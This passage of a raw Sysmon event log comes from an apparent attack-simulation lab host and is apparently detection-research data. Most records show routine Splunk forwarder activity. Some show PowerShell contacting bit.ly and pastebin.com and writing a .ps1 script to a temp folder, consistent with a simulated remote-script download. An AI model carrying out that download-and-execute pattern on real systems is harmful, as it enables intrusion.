11241100x80000000000000002200398Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 13:53:25.021 11241100x80000000000000002200397Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.021{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 13:53:25.021 23542300x80000000000000002200396Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:25.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=786DB22D3849BAE03F9389749F5C6CFC,SHA256=E8EE4CFFA4879F4FA77F403BCDC38C6E983F2735C5A5BC5D416D062358A9C378,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200436Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.439{00000000-0000-0000-0000-000000000000}4524<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local55124-false104.23.99.190-80http 354300x80000000000000002200435Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.420{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local63262- 354300x80000000000000002200434Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.337{00000000-0000-0000-0000-000000000000}4524<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local55123-false67.199.248.11bit.ly80http 354300x80000000000000002200433Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.015{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55122-false10.0.1.12-8000- 23542300x80000000000000002200432Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.692{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92D6CD6F45D78F031A59175CA39306F8,SHA256=1358633D61BE8BA808DA99E3DA9A64956E8E41EDC62B90372EBB024EA108B7CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200431Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.661{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3595170337416601D4CA331E3C88BBD5,SHA256=4FE768B1F2CDFCAB77E278E0A71C13AB401AB46193A06D38676BFDB4CE99C18C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200430Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.583{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DA3C8FA843B9F8E3E2CE32052E1E0EA2,SHA256=B95D1B612893EA91E19FEE2E9B3219CFC6F9A23C4CC3B14C115A3CA68FEA9145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200429Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.521{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=012188A345B92422F6A7C4FFD35291D2,SHA256=FEAFCE080BFE3B588CE18F465D318D3CBAF0095383AFC31FC00578176ECFE1B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200428Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.505{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84906A46B07011956B05E54926E3E806,SHA256=A8405B328323BA3B20894359CF3AD4579B49E240CD3526F443792FCE248E629C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200427Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.239{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=E034B639FD06D8BE47ED3BD328CA0578,SHA256=433FF713043217547E48416D4009C0E033A8632A30B33D3534902A097BCA16F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200426Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.161{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200425Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.005{5ABCFE62-E655-6040-DE4D-00000000AD01}4524C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002200424Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:26.005{5ABCFE62-E655-6040-DE4D-00000000AD01}4524ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200440Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.465{00000000-0000-0000-0000-000000000000}4524<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local55125-false104.23.99.190-443https 23542300x80000000000000002200439Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:27.614{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39AFB00D793A8E63F72CDD69868EF941,SHA256=F2AC8ABEB244562343641F89EEB408F516DC4660BDD4178D641CBC4EE6EC10A1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002200438Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.341{00000000-0000-0000-0000-000000000000}4524bit.ly0::ffff:67.199.248.11;::ffff:67.199.248.10;<unknown process> 23542300x80000000000000002200437Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:27.286{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C1E14F778B5B7D6B5ED2B7EF77E5B0D,SHA256=AD45F2873B89BACC2AC5A31212D235EF1EFAD351AB8A38EFC3967836ED903A32,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002200442Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:23.445{00000000-0000-0000-0000-000000000000}4524pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;<unknown process> 23542300x80000000000000002200441Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:28.302{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B06200F6E49CE2B9DBD35D5CD914F81A,SHA256=90B02F492C7CEEE2AFC1C41494D713460DA129EFD6B1305E30342752DFA58FD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200443Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:29.302{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C137CE8C5700A5B3623B46195DB146D,SHA256=A12A063653AA23F9AE854E654F801F9C300ED2559E84BD3A1C5BBB91C855E9EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200444Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:30.349{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA6E8EF6A7D74285487B175A792F684,SHA256=C9507617B4C3A73BD4905F5CD2590691EE9D53B674060D7A9EC3F44423DDE1B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200446Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:31.364{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=859A818BA27198CECD0233FEB4188919,SHA256=8264892555F49972CEF9B42EF05562A78160CFF0A8711B41F0CCF8F03C6E7135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200445Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:31.208{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21C5488BB7794D63216A29A184FF6E97,SHA256=99415245D1C3B4BA480CFDF54B60AF46C931C0B8525DA4736748B60426971615,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200449Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:32.505{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B7883B1E57E0C5B55138DE08523E04,SHA256=7CE4B123B362823B1023B05B02DF68199291619A103830AA4950F335691313D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200448Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:28.015{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55126-false10.0.1.12-8000- 354300x80000000000000002200447Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:27.889{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51337-true2001:503:ba3e:0:0:0:2:30a.root-servers.net53domain 23542300x80000000000000002200450Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:33.521{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D138C7DBDB72A4208E7B4E67A0FD3EC,SHA256=69255AD747EF9C941550C61E01653B037C0125B04997B9C7B3E8B0030CB420D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200452Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:34.630{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2E62F5DB75A01A27841D0D0A353FB28,SHA256=B4FA417F2405ADBF57FFA78073DA8DBFB375B20ED047FFE0CC76680BB48A7008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200451Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:34.567{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D04EAEC824852959F09DEE8DD924C4,SHA256=1C0A9238F0EED4D0BAEA456877D3CAA920361D8240C9D5D29B2CD657F2ABCD01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200453Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:35.599{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE40CE5D1E0AC0A65913466770A5951,SHA256=0BB3C33DF3E1DFEC33CC422BD4C78B68DB089E2D6FCD83661212F252DE58114B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200455Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:36.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57261820C6AEF48D4A92A98B98322C13,SHA256=46EC5336C6A1A2EA751F822629EA0D39DADBC80233CE52FE540984F296B62CF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200454Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:36.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05478BD6CB5D40656993DE01CBD42745,SHA256=31AF2712504B50981D1077F9E090AABC1F9A10EE4873B5732BF64730A6FA8816,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200457Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:37.708{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7BFDFFBAC7AFA42D9956588679C7773,SHA256=7D41B5905825F7144DD949BB0F65AC0FD89671105C7E66549149B1CC083F8CD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200456Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:33.077{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55127-false10.0.1.12-8000- 23542300x80000000000000002200458Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:38.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F22A4C59DA37F4891E3762F32E751BB,SHA256=F967625339F8E31FADE9843C04ACEFF708F83CB3772524CC54DC4C3EAC13BE51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200459Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:39.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=840A41280FD7C26A1CD651B70B70B147,SHA256=D9399A4FA0EF364D987EA5B1E3B5CC0E9DA1C241BDA7E96AB34FCAB3409778D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200460Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:40.739{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B71245399039629E1D450DF8B87E416,SHA256=C6DA8A58BB201EB6FC072EAF70F21AFC38E5DCA18985296489C6F300DBFB9EAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200461Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:41.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C59833E06B76D4F7573262B4225C33B7,SHA256=0D8EEEEE0C9C0D26547B67F6D9B6A19E4B5E9AA1B896BAA2E6C89AF4BE57D6CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200465Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:42.880{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=319821EE36290FFF24149FD82DE1463A,SHA256=E43F34F87575BB453E9B49FE76E0E38C114A0EA57879050F51B69F85D95220A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200464Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:38.874{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55128-false10.0.1.12-8000- 23542300x80000000000000002200463Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:42.052{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E47AFDD91A8BA63EC2FBF460D4F52E8,SHA256=035B0F319B01AD0A302CB4D3188F9393EA7B64CB76D0A416343A8C84D6C82C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200462Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:42.052{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B8B627ACDD4D903A72AE2B835C2EAB2,SHA256=B1885B6D0F21D8AF1118A33D52F72D0B7F7AC58C3340D14E2BE39AC6095D21FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200466Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:43.927{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1870872C5A88D058B68B585FF4D5867,SHA256=913BDDC9972823FAE0AC9AA308E8D642F5437817EF7C99F17EFAC8B235E45B85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200467Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:45.067{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A331E426762EC1F25817CE9AEBE23700,SHA256=B076F713BC5FD65DFEC35DE3BEA28E3F9FA3C336A146BDEA9CDA485B7C69367F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200468Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:46.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CFF5B2D7FD6F5541ABDF5B688BE66C,SHA256=A404DEA37A3D1E0807280A727C090C68064E43B2C241B8048732F845D3C84D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200471Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:47.302{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E55111AE25FA1D1FE9A23FBE4D6729,SHA256=E52BF97FDF8433D47F67B05E2485F3F563D6E5620E6D86366BCFD833D11CB8AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200470Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:47.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21878A048735377414EC5BD217D7177C,SHA256=1D48FAD13F8841560C5D4AF4BE81EACA2449DA154AE009BD907EEDD902A416EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200469Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:47.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E47AFDD91A8BA63EC2FBF460D4F52E8,SHA256=035B0F319B01AD0A302CB4D3188F9393EA7B64CB76D0A416343A8C84D6C82C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200474Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:48.692{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21878A048735377414EC5BD217D7177C,SHA256=1D48FAD13F8841560C5D4AF4BE81EACA2449DA154AE009BD907EEDD902A416EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200473Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:43.921{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55129-false10.0.1.12-8000- 23542300x80000000000000002200472Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:48.302{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69D646D9E5FF861FC5C40BE8B43B7DF9,SHA256=985AB7E54CBA7E58652D53D2086E00BE1DF9D8BFDB2735FB7CC5F780AFEE70D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200476Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:45.483{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local63555- 23542300x80000000000000002200475Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:49.302{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D95B98A9CC47CBA8345BDC5BA31924E,SHA256=8BA38E47CE0A3CDA86E38118A4E58D8862A45A8361635BEB1543A9E4241B0C54,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200478Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:46.498{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-63555- 23542300x80000000000000002200477Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:50.333{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 